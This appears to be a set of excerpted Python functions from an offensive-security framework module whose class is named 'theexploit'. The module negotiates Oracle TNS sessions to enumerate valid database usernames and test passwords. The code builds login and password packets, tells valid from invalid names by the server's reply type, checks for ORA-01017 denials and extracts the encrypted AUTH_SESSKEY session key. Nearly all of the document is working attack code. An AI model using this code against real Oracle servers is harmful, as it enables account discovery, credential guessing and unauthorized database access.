Exemple #1
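    def setupSession(self, s):
        """Run the three-packet TNS session negotiation on socket ``s``.

        Sends, in order, the SNS packet, the WINNT packet and the "<<<"
        packet built by ``tnslib.TNSDATA``, waiting for a TNS reply after
        each one via the module-level ``TNS`` object.

        Returns 1 when every packet got a reply, 0 as soon as
        ``TNS.recvTNSPkt`` reports failure. Every failure is logged; the
        original left the last stage silent, which made a stalled
        negotiation indistinguishable from the caller's point of view.
        """
        tnsdata = tnslib.TNSDATA()

        # (builder, label) pairs in wire order. One TNSDATA object is reused
        # for all three stages, exactly as the original sequence did.
        stages = (
            (lambda: tnsdata.SNS(self.version), "SNS"),
            (tnsdata.WINNT, "WINNT"),
            (lambda: tnsdata.LESS(self.version), "<<<"),
        )

        for build, label in stages:
            build()
            TNS.sendDataRequest(s, tnsdata.getData())
            if TNS.recvTNSPkt(s) == 0:
                self.log("Problem with response to %s packet" % label)
                return 0
        return 1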
Exemple #2
    def tryUsername(self, s, uname):
        """Send one login packet for ``uname`` and classify the reply.

        The login packet format depends on ``self.version``: LOGINv2 for
        TNS_V9 / TNS_V10, LOGINv1 otherwise.

        Returns 1 only when the reply is a TNS data packet whose data-layer
        type is TNS_DATA_TYPE_EIGHT. Returns 0 when no reply arrives (logged),
        when the data-layer type is anything else, when the reply is a marker
        packet (handed to ``self.doMarkers``), or when the packet type is
        unexpected (logged).

        NOTE(review): the answer is derived purely from how the server's
        reply differs between names - presumably type 8 means the name was
        accepted; confirm against tnslib.
        """
        tnsdata = tnslib.TNSDATA()

        # Pick the packet builder for this protocol version.
        if self.version in (TNS.TNS_V9, TNS.TNS_V10):
            build_login = tnsdata.LOGINv2
        else:
            build_login = tnsdata.LOGINv1
        build_login(uname, self.version)

        TNS.sendDataRequest(s, tnsdata.getData())
        if TNS.recvTNSPkt(s) == 0:
            self.log("Error receiving response to auth request")
            return 0

        # recvTNSPkt leaves the reply on the shared TNS object.
        if TNS.packet_type == TNS.TNS_TYPE_DATA:
            tnsdata.parseDataLayer(TNS.tns_data)
            return 1 if tnsdata.type == tnsdata.TNS_DATA_TYPE_EIGHT else 0

        if TNS.packet_type == TNS.TNS_TYPE_MARKER:
            self.doMarkers(s)
        else:
            self.log("Recvd unexpected TNS_DATA type")
        return 0
Exemple #3
 def processFail(self):
     """Confirm that the last reply is the expected password-failure response.

     Parses the shared ``TNS.tns_data`` buffer. Returns 1 when the
     data-layer type is TNS_DATA_TYPE_FOUR and the payload contains
     either "ORA-01017" or "denied"; otherwise logs which expectation
     was not met and returns 0.
     """
     tnsdata = tnslib.TNSDATA()
     tnsdata.parseDataLayer(TNS.tns_data)

     if tnsdata.type != tnsdata.TNS_DATA_TYPE_FOUR:
         self.log("Unexpected password fail response - expecting type 4")
         return 0

     # Either marker in the payload is enough to call it a denial.
     payload = tnsdata.data
     denial_seen = any(payload.count(marker)
                       for marker in ("ORA-01017", "denied"))
     if not denial_seen:
         self.log(
             "Unexpected password fail response - expecting denied string")
         return 0

     return 1
Exemple #4
 def pwdRequest(self, s, encpwd):
     """Send the password packet carrying ``encpwd`` and wait for a reply.

     Builds a PWDv2 packet for TNS_V9 / TNS_V10 and a PWDv1 packet for
     any other ``self.version``, using ``self.user`` as the account name.

     Returns 1 when a reply was received, 0 (after logging) when
     ``TNS.recvTNSPkt`` reports failure. The reply itself is not
     inspected here; it stays on the shared ``TNS`` object.
     """
     tnsdata = tnslib.TNSDATA()

     uses_v2 = self.version in (TNS.TNS_V9, TNS.TNS_V10)
     build_pwd = tnsdata.PWDv2 if uses_v2 else tnsdata.PWDv1
     build_pwd(self.version, self.user, encpwd)

     TNS.sendDataRequest(s, tnsdata.getData())
     if TNS.recvTNSPkt(s) != 0:
         return 1

     self.log("Error receiving response to password packet")
     return 0
Exemple #5
 def testSuccess(self):
     """Classify the last reply on the shared ``TNS`` object as success or not.

     Returns 0 when the packet is not a TNS data packet. Otherwise the
     data layer is parsed and:

     * type TNS_DATA_TYPE_EIGHT -> 1
     * type TNS_DATA_TYPE_FOUR  -> 0 if the payload contains "ORA-01017"
       or "denied", else 1
     * any other type           -> 0

     NOTE(review): a type-4 reply without either denial string is
     treated as success; that is what the code does, but whether every
     such reply really is one is not visible here - confirm.
     """
     if TNS.packet_type != TNS.TNS_TYPE_DATA:
         return 0

     tnsdata = tnslib.TNSDATA()
     tnsdata.parseDataLayer(TNS.tns_data)

     if tnsdata.type == tnsdata.TNS_DATA_TYPE_EIGHT:
         return 1
     if tnsdata.type != tnsdata.TNS_DATA_TYPE_FOUR:
         return 0

     # Type 4: only an explicit denial marker counts as failure.
     denied = (tnsdata.data.count("ORA-01017")
               or tnsdata.data.count("denied"))
     return 0 if denied else 1
Exemple #6
 def authRequest(self, s):
     """Send the login packet for ``self.user`` and check the reply type.

     Uses LOGINv2 for TNS_V9 / TNS_V10 and LOGINv1 for any other
     ``self.version``.

     Returns 1 when a reply arrived and it is a TNS data packet.
     Returns 0 (after logging) when no reply arrived or when the reply
     has a different packet type.
     """
     tnsdata = tnslib.TNSDATA()

     # Version decides which login packet layout is built.
     newer_protocol = self.version in (TNS.TNS_V9, TNS.TNS_V10)
     if newer_protocol:
         tnsdata.LOGINv2(self.user, self.version)
     else:
         tnsdata.LOGINv1(self.user, self.version)

     TNS.sendDataRequest(s, tnsdata.getData())
     if TNS.recvTNSPkt(s) == 0:
         self.log("Error receiving response to auth request")
         return 0

     if TNS.packet_type == TNS.TNS_TYPE_DATA:
         return 1

     self.log(
         "Did not receive expected TNS_TYPE_DATA in response to auth request - bad username?"
     )
     return 0
Exemple #7
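    def getEncryptedSessionkey(self):
        """Slice the 16-byte encrypted session key out of the last TNS reply.

        Parses the shared ``TNS.tns_data`` buffer. The first payload byte
        selects the layout: when it is 1 (the long, v1 form of the auth/pwd
        exchange) the key is located through the ``AUTH_SESSKEY`` field name;
        otherwise (the short form) it is read from fixed offset 3.

        Returns the 16-byte slice, or 0 after logging when the payload is
        empty, the field name is absent, or fewer than 16 bytes are left at
        the computed offset.
        """
        tnsdata = tnslib.TNSDATA()
        tnsdata.parseDataLayer(TNS.tns_data)
        payload = tnsdata.data

        # The payload is whatever the peer sent. An empty one used to raise
        # on the index below instead of taking the normal 0-on-failure path.
        if not payload:
            self.log("Empty data layer - no session key")
            return 0

        layout = struct.unpack("B", payload[0])[0]
        if layout == 1:
            keyloc = payload.find("AUTH_SESSKEY")
            # find() returns -1 on a miss; index 0 cannot be a hit because
            # byte 0 is the layout marker just read.
            if keyloc <= 0:
                self.log("Key not found..?")
                return 0
            # Skip the 12-character field name plus 5 further bytes. The
            # original author notes the real field format is unknown, so
            # this offset is empirical rather than parsed.
            keyloc += 17
        else:
            keyloc = 3

        key = payload[keyloc:keyloc + 16]
        # A truncated reply would otherwise hand the caller a short key
        # with no indication that anything was wrong.
        if len(key) != 16:
            self.log("Truncated session key in response")
            return 0
        return key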
Exemple #8
# Module metadata. PROPERTY itself is created earlier in the file, outside
# this excerpt; only these two keys are set here.
PROPERTY['ARCH'] = [["Windows"], ["Linux"], ["Solaris"]]
PROPERTY['TYPE'] = "Tool"

# Free-text description of what the module does.
NOTES = """
Attempt to identify Oracle usernames   
"""

# No entries recorded.
CHANGELOG = """
"""

# GUI run exploit
# Re-export the engine's two runner entry points under module-level names.
runAnExploit_gtk2 = canvasengine.runAnExploit_gtk2
runExploit = canvasengine.runExploit

# Single module-level protocol objects, created at import time.
# NOTE(review): code that reads TNS.packet_type / TNS.tns_data after a
# receive is reading state on this one shared instance - presumably not safe
# for concurrent sessions in the same process; confirm before reusing.
TNS = tnslib.TNS()
tnsdata = tnslib.TNSDATA()


class theexploit(tcpexploit):
    def __init__(self):
        tcpexploit.__init__(self)
        self.setInfo(DESCRIPTION)
        self.host = "vmware.local"
        self.port = 1521
        self.covertness = 0
        self.ssl = 0
        self.done = 0
        self.version = 1
        self.dbasenames = []
        self.version = 0
        self.defaultfile = "oracleusernames"